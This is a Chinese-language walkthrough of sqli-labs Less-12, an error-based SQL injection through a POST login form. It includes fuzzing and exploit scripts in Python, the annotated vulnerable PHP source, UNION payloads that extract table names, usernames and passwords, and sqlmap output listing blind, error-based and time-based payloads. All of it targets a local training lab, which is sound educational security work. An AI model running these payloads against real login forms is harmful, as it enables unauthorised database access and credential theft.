sqli-lab-less12
一、靶标地址
Less-12 POST-Error Based-Double quotes-String - with twist
#字符型带双引号和括号基于报错的SQL注入
http://127.0.0.1/sqli/less-12/
二、漏洞探测
输入 admin / admin 尝试登录
抓到的 POST 数据包如下
uname=admin&passwd=admin&submit=Submit
#Your Login name:admin
#Your Password:admin
猜测业务逻辑是：用输入的 username、password 去数据库查询，再将查询结果进行比对
uname=1")&passwd=2&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") and password=("2") LIMIT 0,1' at line 1
从报错信息可以看出，语句后半段为 ") and password=("2") LIMIT 0,1
推测完整语句为 select username,password from users where username=("$uname") and password=("$passwd") limit 0,1;
fuzz.txt
'
"
')
")
'))
"))
#使用python脚本进行fuzz
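import requests

# Lab target: a local sqli-labs instance (Less-12). Each line of the wordlist
# is appended to "1" and posted as the `uname` form field; the raw response is
# printed so the SQL error text the page echoes back can be read off.
url = "http://192.168.128.159/sqli/less-12/index.php"
# Request headers copied from the browser (F12) or a Burp Suite capture.
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
}
# Wordlist with one quote/bracket variant per line. The write-up lists it as
# fuzz.txt while the script reads fuzz-12.txt — keep the two names in sync.
WORDLIST = "./fuzz-12.txt"
# Seconds to wait for the lab server; without a timeout requests.post can
# block forever if the server stalls.
TIMEOUT = 10

# `with` guarantees the file handle is closed even if reading fails.
with open(WORDLIST, "r", encoding="utf-8") as wordlist:
    payloads = wordlist.read().splitlines()

for i, suffix in enumerate(payloads):
    print("==============This is " + str(i) + suffix + "==============")
    subpayload = "1" + suffix
    payload = {
        "uname": subpayload,
        "passwd": "1",
    }
    response = requests.post(url, headers=header, data=payload, timeout=TIMEOUT)
    print(response.text)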
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// Silences PHP-level error output only; it does NOT suppress the explicit
// print_r(mysql_error()) in the else branch below.
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
// Raw, unvalidated POST values; both flow straight into the SQL string below.
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
// Security note: every submitted username and password is appended in
// cleartext to result.txt — a credential-exposure risk in its own right.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
// Each value is wrapped in double quotes, so the SQL context is ("..."):
// an input containing ") closes that context. This is the injection point the
// write-up exploits; a prepared statement with bound parameters would remove it.
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
// The @ only silences warnings from this assignment; the query is still built
// by string interpolation rather than parameterized.
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
// Legacy mysql_* extension (deprecated in PHP 5.5, removed in PHP 7.0).
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
// The matched row's password column is echoed to the client in cleartext; a
// UNION query can therefore surface arbitrary selected values in this field.
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
// Raw MySQL error text is returned to the client — the error-based oracle
// used in the detection step; errors should be logged server-side instead.
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
四、黑盒与白盒测试
// Excerpt of the query-building lines from the source listed in section 三.
// Both POST values are wrapped in double quotes and interpolated into the SQL
// string unescaped, so the effective context for uname is ("...").
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
// Query text is assembled by interpolation, not bound parameters.
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
// Only the first matching row is ever read (LIMIT 0,1 above).
$row = mysql_fetch_array($result);
#查询用户和数据库
uname=1") union select user(),database() #&passwd=1&submit=Submit
#下面这条会报错：此处不能使用 --+ 作为注释，改用 # 则不会报错
uname=1' union select user(),database() --+&passwd=1&submit=Submit
#uname=1 本身不会返回任何行，因此 union 后半段查询出的两个值才能被回显出来
select username,password from users where username=("1") union select user(),database() #' and password=("1") limit 0,1;
#查询表名
uname=1") union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),database() #&passwd=1&submit=Submit
#查询字段名
uname=1") union select (select group_concat(column_name) from information_schema.columns where table_name='users'),database() #&passwd=1&submit=Submit
#查询字段值
uname=1") union select (select group_concat(username) from users),database() #&passwd=1&submit=Submit
uname=1") union select (select group_concat(password) from users),database() #&passwd=1&submit=Submit
五、脚本撰写
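import requests

# Lab target: a local sqli-labs instance (Less-12).
url = "http://192.168.128.159/sqli/less-12/index.php"
# Request headers copied from the browser (F12) or a Burp Suite capture.
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
}
# Seconds to wait for the lab server; without a timeout requests.post can
# block forever if the server stalls.
TIMEOUT = 10
# Form fields for the single request worked out in section 四 above.
payload = {
    "uname": "1\") union select user(),database() #",
    "passwd": "admin",
}
response = requests.post(url, headers=header, data=payload, timeout=TIMEOUT)
# The raw HTML is printed so the echoed "Your Login name" / "Your Password"
# fields can be read off directly.
print(response.text)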
六、sqlmap
sqlmap -u "http://192.168.128.159/sqli/Less-12/" --data "uname=1&passwd=1&submit=Submit" --batch
Parameter: uname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uname=1") OR NOT 8916=8916#&passwd=1&submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=1") AND (SELECT 4663 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(4663=4663,1))),0x7171717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("JyBN"="JyBN&passwd=1&submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1") AND (SELECT 8405 FROM (SELECT(SLEEP(5)))MNFl) AND ("TVUz"="TVUz&passwd=1&submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=1") UNION ALL SELECT NULL,CONCAT(0x716a706a71,0x674d56426a6c737944506f647a52447875467642456b6668746d774443625075704f445572737070,0x7171717071)#&passwd=1&submit=Submit
七、总结
1、本关数据通过 POST 表单提交，注入点在 uname 参数
2、sqlmap 针对 POST 数据的新用法（--data 参数）